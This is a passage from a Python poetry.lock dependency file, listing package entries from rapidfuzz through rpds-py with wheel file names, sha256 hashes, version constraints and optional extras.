"rapidfuzz-3.4.0-pp37-pypy37_pp73-win_amd64.whl", hash = "sha256:dd54dd0355225dc3c1d55e233d510adcccee9bb25d656b4cf1136114b92e7bf3"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-macosx_10_9_x86_64.whl", hash = "sha256:f5921780e7995e9ac3cea41fa57b623159d7295788618d3f2946d61328c25c25"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fc4b1b69a64d337c40fa07a721dae1b1550d90f17973fb348055f6440d597e26"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6f5c8b901b6d3be63591c68e2612f76ad85af27193d0a88d4d87bb047aeafcb3"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c67f5ced39aff6277dd772b239ef8aa8fc810200a3b42f69ddbb085ea0e18232"}, {file = "rapidfuzz-3.4.0-pp38-pypy38_pp73-win_amd64.whl", hash = "sha256:4fd94acab871afbc845400814134a83512a711e824dc2c9a9776d6123464a221"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-macosx_10_9_x86_64.whl", hash = "sha256:437508ec1ea6e71a77126715ac6208cb9c3e74272536ebfa79be9dd008cfb85f"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a7215f7c5de912b364d5cf7c4c66915ccf4acf71aafbb8da62ad346569196e15"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:698488002eb7be2f737e48679ed0cd310b76291f26d8ec792db8345d13eb6573"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e77873126eb07e7461f0b675263e6c5d42c8a952e88e4a44eeff96f237b2b024"}, {file = "rapidfuzz-3.4.0-pp39-pypy39_pp73-win_amd64.whl", hash = "sha256:28d03cd33817f6e0bea9b618b460f85ff9c9c3fedc6c19cfa0992f719a0d1801"}, {file = "rapidfuzz-3.4.0.tar.gz", hash = "sha256:a74112e2126b428c77db5e96f7ce34e91e750552147305b2d361122cbede2955"}, ] [package.extras] full = ["numpy"] [[package]] name = "rapidocr-onnxruntime" version = "1.3.7" description = "A cross platform OCR Library based on OnnxRuntime." optional = true python-versions = ">=3.6,<3.12" files = [ {file = "rapidocr_onnxruntime-1.3.7-py3-none-any.whl", hash = "sha256:9d061786f6255c57a98f04a2f7624eacabc1d0dede2a69707c99a6dd9024e6fa"}, ] [package.dependencies] numpy = ">=1.19.5" onnxruntime = ">=1.7.0" opencv-python = ">=4.5.1.48" Pillow = "*" pyclipper = ">=1.2.0" PyYAML = "*" Shapely = ">=1.7.1" six = ">=1.15.0" [[package]] name = "ratelimiter" version = "1.2.0.post0" description = "Simple python rate limiting object" optional = true python-versions = "*" files = [ {file = "ratelimiter-1.2.0.post0-py3-none-any.whl", hash = "sha256:a52be07bc0bb0b3674b4b304550f10c769bbb00fead3072e035904474259809f"}, {file = "ratelimiter-1.2.0.post0.tar.gz", hash = "sha256:5c395dcabdbbde2e5178ef3f89b568a3066454a6ddc223b76473dac22f89b4f7"}, ] [package.extras] test = ["pytest (>=3.0)", "pytest-asyncio"] [[package]] name = "rdflib" version = "6.3.2" description = "RDFLib is a Python library for working with RDF, a simple yet powerful language for representing information." optional = true python-versions = ">=3.7,<4.0" files = [ {file = "rdflib-6.3.2-py3-none-any.whl", hash = "sha256:36b4e74a32aa1e4fa7b8719876fb192f19ecd45ff932ea5ebbd2e417a0247e63"}, {file = "rdflib-6.3.2.tar.gz", hash = "sha256:72af591ff704f4caacea7ecc0c5a9056b8553e0489dd4f35a9bc52dbd41522e0"}, ] [package.dependencies] isodate = ">=0.6.0,<0.7.0" pyparsing = ">=2.1.0,<4" [package.extras] berkeleydb = ["berkeleydb (>=18.1.0,<19.0.0)"] html = ["html5lib (>=1.0,<2.0)"] lxml = ["lxml (>=4.3.0,<5.0.0)"] networkx = ["networkx (>=2.0.0,<3.0.0)"] [[package]] name = "redis" version = "4.6.0" description = "Python client for Redis database and key-value store" optional = true python-versions = ">=3.7" files = [ {file = "redis-4.6.0-py3-none-any.whl", hash = "sha256:e2b03db868160ee4591de3cb90d40ebb50a90dd302138775937f6a42b7ed183c"}, {file = "redis-4.6.0.tar.gz", hash = "sha256:585dc516b9eb042a619ef0a39c3d7d55fe81bdb4df09a52c9cdde0d07bf1aa7d"}, ] [package.dependencies] async-timeout = {version = ">=4.0.2", markers = "python_full_version <= \"3.11.2\""} [package.extras] hiredis = ["hiredis (>=1.0.0)"] ocsp = ["cryptography (>=36.0.1)", "pyopenssl (==20.0.1)", "requests (>=2.26.0)"] [[package]] name = "referencing" version = "0.30.2" description = "JSON Referencing + Python" optional = false python-versions = ">=3.8" files = [ {file = "referencing-0.30.2-py3-none-any.whl", hash = "sha256:449b6669b6121a9e96a7f9e410b245d471e8d48964c67113ce9afe50c8dd7bdf"}, {file = "referencing-0.30.2.tar.gz", hash = "sha256:794ad8003c65938edcdbc027f1933215e0d0ccc0291e3ce20a4d87432b59efc0"}, ] [package.dependencies] attrs = ">=22.2.0" rpds-py = ">=0.7.0" [[package]] name = "regex" version = "2023.10.3" description = "Alternative regular expression module, to replace re." optional = false python-versions = ">=3.7" files = [ {file = "regex-2023.10.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:4c34d4f73ea738223a094d8e0ffd6d2c1a1b4c175da34d6b0de3d8d69bee6bcc"}, {file = "regex-2023.10.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:a8f4e49fc3ce020f65411432183e6775f24e02dff617281094ba6ab079ef0915"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4cd1bccf99d3ef1ab6ba835308ad85be040e6a11b0977ef7ea8c8005f01a3c29"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:81dce2ddc9f6e8f543d94b05d56e70d03a0774d32f6cca53e978dc01e4fc75b8"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9c6b4d23c04831e3ab61717a707a5d763b300213db49ca680edf8bf13ab5d91b"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c15ad0aee158a15e17e0495e1e18741573d04eb6da06d8b84af726cfc1ed02ee"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6239d4e2e0b52c8bd38c51b760cd870069f0bdf99700a62cd509d7a031749a55"}, {file = "regex-2023.10.3-cp310-cp310-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:4a8bf76e3182797c6b1afa5b822d1d5802ff30284abe4599e1247be4fd6b03be"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d9c727bbcf0065cbb20f39d2b4f932f8fa1631c3e01fcedc979bd4f51fe051c5"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:3ccf2716add72f80714b9a63899b67fa711b654be3fcdd34fa391d2d274ce767"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:107ac60d1bfdc3edb53be75e2a52aff7481b92817cfdddd9b4519ccf0e54a6ff"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:00ba3c9818e33f1fa974693fb55d24cdc8ebafcb2e4207680669d8f8d7cca79a"}, {file = "regex-2023.10.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:f0a47efb1dbef13af9c9a54a94a0b814902e547b7f21acb29434504d18f36e3a"}, {file = "regex-2023.10.3-cp310-cp310-win32.whl", hash = "sha256:36362386b813fa6c9146da6149a001b7bd063dabc4d49522a1f7aa65b725c7ec"}, {file = "regex-2023.10.3-cp310-cp310-win_amd64.whl", hash = "sha256:c65a3b5330b54103e7d21cac3f6bf3900d46f6d50138d73343d9e5b2900b2353"}, {file = "regex-2023.10.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:90a79bce019c442604662d17bf69df99090e24cdc6ad95b18b6725c2988a490e"}, {file = "regex-2023.10.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:c7964c2183c3e6cce3f497e3a9f49d182e969f2dc3aeeadfa18945ff7bdd7051"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4ef80829117a8061f974b2fda8ec799717242353bff55f8a29411794d635d964"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5addc9d0209a9afca5fc070f93b726bf7003bd63a427f65ef797a931782e7edc"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c148bec483cc4b421562b4bcedb8e28a3b84fcc8f0aa4418e10898f3c2c0eb9b"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8d1f21af4c1539051049796a0f50aa342f9a27cde57318f2fc41ed50b0dbc4ac"}, {file = "regex-2023.10.3-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0b9ac09853b2a3e0d0082104036579809679e7715671cfbf89d83c1cb2a30f58"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:ebedc192abbc7fd13c5ee800e83a6df252bec691eb2c4bedc9f8b2e2903f5e2a"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:d8a993c0a0ffd5f2d3bda23d0cd75e7086736f8f8268de8a82fbc4bd0ac6791e"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:be6b7b8d42d3090b6c80793524fa66c57ad7ee3fe9722b258aec6d0672543fd0"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:4023e2efc35a30e66e938de5aef42b520c20e7eda7bb5fb12c35e5d09a4c43f6"}, {file = "regex-2023.10.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:0d47840dc05e0ba04fe2e26f15126de7c755496d5a8aae4a08bda4dd8d646c54"}, {file = "regex-2023.10.3-cp311-cp311-win32.whl", hash = "sha256:9145f092b5d1977ec8c0ab46e7b3381b2fd069957b9862a43bd383e5c01d18c2"}, {file = "regex-2023.10.3-cp311-cp311-win_amd64.whl", hash = "sha256:b6104f9a46bd8743e4f738afef69b153c4b8b592d35ae46db07fc28ae3d5fb7c"}, {file = "regex-2023.10.3-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:bff507ae210371d4b1fe316d03433ac099f184d570a1a611e541923f78f05037"}, {file = "regex-2023.10.3-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:be5e22bbb67924dea15039c3282fa4cc6cdfbe0cbbd1c0515f9223186fc2ec5f"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4a992f702c9be9c72fa46f01ca6e18d131906a7180950958f766c2aa294d4b41"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7434a61b158be563c1362d9071358f8ab91b8d928728cd2882af060481244c9e"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c2169b2dcabf4e608416f7f9468737583ce5f0a6e8677c4efbf795ce81109d7c"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a9e908ef5889cda4de038892b9accc36d33d72fb3e12c747e2799a0e806ec841"}, {file = "regex-2023.10.3-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:12bd4bc2c632742c7ce20db48e0d99afdc05e03f0b4c1af90542e05b809a03d9"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:bc72c231f5449d86d6c7d9cc7cd819b6eb30134bb770b8cfdc0765e48ef9c420"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:bce8814b076f0ce5766dc87d5a056b0e9437b8e0cd351b9a6c4e1134a7dfbda9"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:ba7cd6dc4d585ea544c1412019921570ebd8a597fabf475acc4528210d7c4a6f"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_s390x.whl", hash = "sha256:b0c7d2f698e83f15228ba41c135501cfe7d5740181d5903e250e47f617eb4292"}, {file = "regex-2023.10.3-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:5a8f91c64f390ecee09ff793319f30a0f32492e99f5dc1c72bc361f23ccd0a9a"}, {file = "regex-2023.10.3-cp312-cp312-win32.whl", hash = "sha256:ad08a69728ff3c79866d729b095872afe1e0557251da4abb2c5faff15a91d19a"}, {file = "regex-2023.10.3-cp312-cp312-win_amd64.whl", hash = "sha256:39cdf8d141d6d44e8d5a12a8569d5a227f645c87df4f92179bd06e2e2705e76b"}, {file = "regex-2023.10.3-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:4a3ee019a9befe84fa3e917a2dd378807e423d013377a884c1970a3c2792d293"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:76066d7ff61ba6bf3cb5efe2428fc82aac91802844c022d849a1f0f53820502d"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:bfe50b61bab1b1ec260fa7cd91106fa9fece57e6beba05630afe27c71259c59b"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9fd88f373cb71e6b59b7fa597e47e518282455c2734fd4306a05ca219a1991b0"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b3ab05a182c7937fb374f7e946f04fb23a0c0699c0450e9fb02ef567412d2fa3"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:dac37cf08fcf2094159922edc7a2784cfcc5c70f8354469f79ed085f0328ebdf"}, {file = "regex-2023.10.3-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:e54ddd0bb8fb626aa1f9ba7b36629564544954fff9669b15da3610c22b9a0991"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:3367007ad1951fde612bf65b0dffc8fd681a4ab98ac86957d16491400d661302"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:16f8740eb6dbacc7113e3097b0a36065a02e37b47c936b551805d40340fb9971"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:f4f2ca6df64cbdd27f27b34f35adb640b5d2d77264228554e68deda54456eb11"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:39807cbcbe406efca2a233884e169d056c35aa7e9f343d4e78665246a332f597"}, {file = "regex-2023.10.3-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:7eece6fbd3eae4a92d7c748ae825cbc1ee41a89bb1c3db05b5578ed3cfcfd7cb"}, {file = "regex-2023.10.3-cp37-cp37m-win32.whl", hash = "sha256:ce615c92d90df8373d9e13acddd154152645c0dc060871abf6bd43809673d20a"}, {file = "regex-2023.10.3-cp37-cp37m-win_amd64.whl", hash = "sha256:0f649fa32fe734c4abdfd4edbb8381c74abf5f34bc0b3271ce687b23729299ed"}, {file = "regex-2023.10.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:9b98b7681a9437262947f41c7fac567c7e1f6eddd94b0483596d320092004533"}, {file = "regex-2023.10.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:91dc1d531f80c862441d7b66c4505cd6ea9d312f01fb2f4654f40c6fdf5cc37a"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:82fcc1f1cc3ff1ab8a57ba619b149b907072e750815c5ba63e7aa2e1163384a4"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:7979b834ec7a33aafae34a90aad9f914c41fd6eaa8474e66953f3f6f7cbd4368"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:ef71561f82a89af6cfcbee47f0fabfdb6e63788a9258e913955d89fdd96902ab"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd829712de97753367153ed84f2de752b86cd1f7a88b55a3a775eb52eafe8a94"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:00e871d83a45eee2f8688d7e6849609c2ca2a04a6d48fba3dff4deef35d14f07"}, {file = "regex-2023.10.3-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:706e7b739fdd17cb89e1fbf712d9dc21311fc2333f6d435eac2d4ee81985098c"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:cc3f1c053b73f20c7ad88b0d1d23be7e7b3901229ce89f5000a8399746a6e039"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:6f85739e80d13644b981a88f529d79c5bdf646b460ba190bffcaf6d57b2a9863"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:741ba2f511cc9626b7561a440f87d658aabb3d6b744a86a3c025f866b4d19e7f"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:e77c90ab5997e85901da85131fd36acd0ed2221368199b65f0d11bca44549711"}, {file = "regex-2023.10.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:979c24cbefaf2420c4e377ecd1f165ea08cc3d1fbb44bdc51bccbbf7c66a2cb4"}, {file = "regex-2023.10.3-cp38-cp38-win32.whl", hash = "sha256:58837f9d221744d4c92d2cf7201c6acd19623b50c643b56992cbd2b745485d3d"}, {file = "regex-2023.10.3-cp38-cp38-win_amd64.whl", hash = "sha256:c55853684fe08d4897c37dfc5faeff70607a5f1806c8be148f1695be4a63414b"}, {file = "regex-2023.10.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:2c54e23836650bdf2c18222c87f6f840d4943944146ca479858404fedeb9f9af"}, {file = "regex-2023.10.3-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:69c0771ca5653c7d4b65203cbfc5e66db9375f1078689459fe196fe08b7b4930"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6ac965a998e1388e6ff2e9781f499ad1eaa41e962a40d11c7823c9952c77123e"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1c0e8fae5b27caa34177bdfa5a960c46ff2f78ee2d45c6db15ae3f64ecadde14"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:6c56c3d47da04f921b73ff9415fbaa939f684d47293f071aa9cbb13c94afc17d"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7ef1e014eed78ab650bef9a6a9cbe50b052c0aebe553fb2881e0453717573f52"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d29338556a59423d9ff7b6eb0cb89ead2b0875e08fe522f3e068b955c3e7b59b"}, {file = "regex-2023.10.3-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:9c6d0ced3c06d0f183b73d3c5920727268d2201aa0fe6d55c60d68c792ff3588"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:994645a46c6a740ee8ce8df7911d4aee458d9b1bc5639bc968226763d07f00fa"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:66e2fe786ef28da2b28e222c89502b2af984858091675044d93cb50e6f46d7af"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:11175910f62b2b8c055f2b089e0fedd694fe2be3941b3e2633653bc51064c528"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:06e9abc0e4c9ab4779c74ad99c3fc10d3967d03114449acc2c2762ad4472b8ca"}, {file = "regex-2023.10.3-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:fb02e4257376ae25c6dd95a5aec377f9b18c09be6ebdefa7ad209b9137b73d48"}, {file = "regex-2023.10.3-cp39-cp39-win32.whl", hash = "sha256:3b2c3502603fab52d7619b882c25a6850b766ebd1b18de3df23b2f939360e1bd"}, {file = "regex-2023.10.3-cp39-cp39-win_amd64.whl", hash = "sha256:adbccd17dcaff65704c856bd29951c58a1bd4b2b0f8ad6b826dbd543fe740988"}, {file = "regex-2023.10.3.tar.gz", hash = "sha256:3fef4f844d2290ee0ba57addcec17eec9e3df73f10a2748485dfd6a3a188cc0f"}, ] [[package]] name = "requests" version = "2.31.0" description = "Python HTTP for Humans." optional = false python-versions = ">=3.7" files = [ {file = "requests-2.31.0-py3-none-any.whl", hash = "sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003f"}, {file = "requests-2.31.0.tar.gz", hash = "sha256:942c5a758f98d790eaed1a29cb6eefc7ffb0d1cf7af05c3d2791656dbd6ad1e1"}, ] [package.dependencies] certifi = ">=2017.4.17" charset-normalizer = ">=2,<4" idna = ">=2.5,<4" PySocks = {version = ">=1.5.6,<1.5.7 || >1.5.7", optional = true, markers = "extra == \"socks\""} urllib3 = ">=1.21.1,<3" [package.extras] socks = ["PySocks (>=1.5.6,!=1.5.7)"] use-chardet-on-py3 = ["chardet (>=3.0.2,<6)"] [[package]] name = "requests-file" version = "1.5.1" description = "File transport adapter for Requests" optional = true python-versions = "*" files = [ {file = "requests-file-1.5.1.tar.gz", hash = "sha256:07d74208d3389d01c38ab89ef403af0cfec63957d53a0081d8eca738d0247d8e"}, {file = "requests_file-1.5.1-py2.py3-none-any.whl", hash = "sha256:dfe5dae75c12481f68ba353183c53a65e6044c923e64c24b2209f6c7570ca953"}, ] [package.dependencies] requests = ">=1.0.0" six = "*" [[package]] name = "requests-mock" version = "1.11.0" description = "Mock out responses from the requests package" optional = false python-versions = "*" files = [ {file = "requests-mock-1.11.0.tar.gz", hash = "sha256:ef10b572b489a5f28e09b708697208c4a3b2b89ef80a9f01584340ea357ec3c4"}, {file = "requests_mock-1.11.0-py2.py3-none-any.whl", hash = "sha256:f7fae383f228633f6bececebdab236c478ace2284d6292c6e7e2867b9ab74d15"}, ] [package.dependencies] requests = ">=2.3,<3" six = "*" [package.extras] fixture = ["fixtures"] test = ["fixtures", "mock", "purl", "pytest", "requests-futures", "sphinx", "testtools"] [[package]] name = "requests-oauthlib" version = "1.3.1" description = "OAuthlib authentication support for Requests." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "requests-oauthlib-1.3.1.tar.gz", hash = "sha256:75beac4a47881eeb94d5ea5d6ad31ef88856affe2332b9aafb52c6452ccf0d7a"}, {file = "requests_oauthlib-1.3.1-py2.py3-none-any.whl", hash = "sha256:2577c501a2fb8d05a304c09d090d6e47c306fef15809d102b327cf8364bddab5"}, ] [package.dependencies] oauthlib = ">=3.0.0" requests = ">=2.0.0" [package.extras] rsa = ["oauthlib[signedtoken] (>=3.0.0)"] [[package]] name = "requests-toolbelt" version = "1.0.0" description = "A utility belt for advanced users of python-requests" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "requests-toolbelt-1.0.0.tar.gz", hash = "sha256:7681a0a3d047012b5bdc0ee37d7f8f07ebe76ab08caeccfc3921ce23c88d5bc6"}, {file = "requests_toolbelt-1.0.0-py2.py3-none-any.whl", hash = "sha256:cccfdd665f0a24fcf4726e690f65639d272bb0637b9b92dfd91a5568ccf6bd06"}, ] [package.dependencies] requests = ">=2.0.1,<3.0.0" [[package]] name = "responses" version = "0.22.0" description = "A utility library for mocking out the `requests` Python library." optional = false python-versions = ">=3.7" files = [ {file = "responses-0.22.0-py3-none-any.whl", hash = "sha256:dcf294d204d14c436fddcc74caefdbc5764795a40ff4e6a7740ed8ddbf3294be"}, {file = "responses-0.22.0.tar.gz", hash = "sha256:396acb2a13d25297789a5866b4881cf4e46ffd49cc26c43ab1117f40b973102e"}, ] [package.dependencies] requests = ">=2.22.0,<3.0" toml = "*" types-toml = "*" urllib3 = ">=1.25.10" [package.extras] tests = ["coverage (>=6.0.0)", "flake8", "mypy", "pytest (>=7.0.0)", "pytest-asyncio", "pytest-cov", "pytest-httpserver", "types-requests"] [[package]] name = "retry" version = "0.9.2" description = "Easy to use retry decorator." optional = true python-versions = "*" files = [ {file = "retry-0.9.2-py2.py3-none-any.whl", hash = "sha256:ccddf89761fa2c726ab29391837d4327f819ea14d244c232a1d24c67a2f98606"}, {file = "retry-0.9.2.tar.gz", hash = "sha256:f8bfa8b99b69c4506d6f5bd3b0aabf77f98cdb17f3c9fc3f5ca820033336fba4"}, ] [package.dependencies] decorator = ">=3.4.2" py = ">=1.4.26,<2.0.0" [[package]] name = "rfc3339-validator" version = "0.1.4" description = "A pure python RFC3339 validator" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "rfc3339_validator-0.1.4-py2.py3-none-any.whl", hash = "sha256:24f6ec1eda14ef823da9e36ec7113124b39c04d50a4d3d3a3c2859577e7791fa"}, {file = "rfc3339_validator-0.1.4.tar.gz", hash = "sha256:138a2abdf93304ad60530167e51d2dfb9549521a836871b88d7f4695d0022f6b"}, ] [package.dependencies] six = "*" [[package]] name = "rfc3986-validator" version = "0.1.1" description = "Pure python rfc3986 validator" optional = false python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "rfc3986_validator-0.1.1-py2.py3-none-any.whl", hash = "sha256:2f235c432ef459970b4306369336b9d5dbdda31b510ca1e327636e01f528bfa9"}, {file = "rfc3986_validator-0.1.1.tar.gz", hash = "sha256:3d44bde7921b3b9ec3ae4e3adca370438eccebc676456449b145d533b240d055"}, ] [[package]] name = "rich" version = "13.6.0" description = "Render rich text, tables, progress bars, syntax highlighting, markdown and more to the terminal" optional = true python-versions = ">=3.7.0" files = [ {file = "rich-13.6.0-py3-none-any.whl", hash = "sha256:2b38e2fe9ca72c9a00170a1a2d20c63c790d0e10ef1fe35eba76e1e7b1d7d245"}, {file = "rich-13.6.0.tar.gz", hash = "sha256:5c14d22737e6d5084ef4771b62d5d4363165b403455a30a1c8ca39dc7b644bef"}, ] [package.dependencies] markdown-it-py = ">=2.2.0" pygments = ">=2.13.0,<3.0.0" typing-extensions = {version = ">=4.0.0,<5.0", markers = "python_version < \"3.9\""} [package.extras] jupyter = ["ipywidgets (>=7.5.1,<9)"] [[package]] name = "rpds-py" version = "0.10.6" description = "Python bindings to Rust's persistent data structures (rpds)" optional = false python-versions = ">=3.8" files = [ {file = "rpds_py-0.10.6-cp310-cp310-macosx_10_7_x86_64.whl", hash = "sha256:6bdc11f9623870d75692cc33c59804b5a18d7b8a4b79ef0b00b773a27397d1f6"}, {file = "rpds_py-0.10.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:26857f0f44f0e791f4a266595a7a09d21f6b589580ee0585f330aaccccb836e3"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d7f5e15c953ace2e8dde9824bdab4bec50adb91a5663df08d7d994240ae6fa31"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_armv7l.manylinux2014_armv7l.whl", hash = "sha256:61fa268da6e2e1cd350739bb61011121fa550aa2545762e3dc02ea177ee4de35"}, {file = "rpds_py-0.10.6-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = 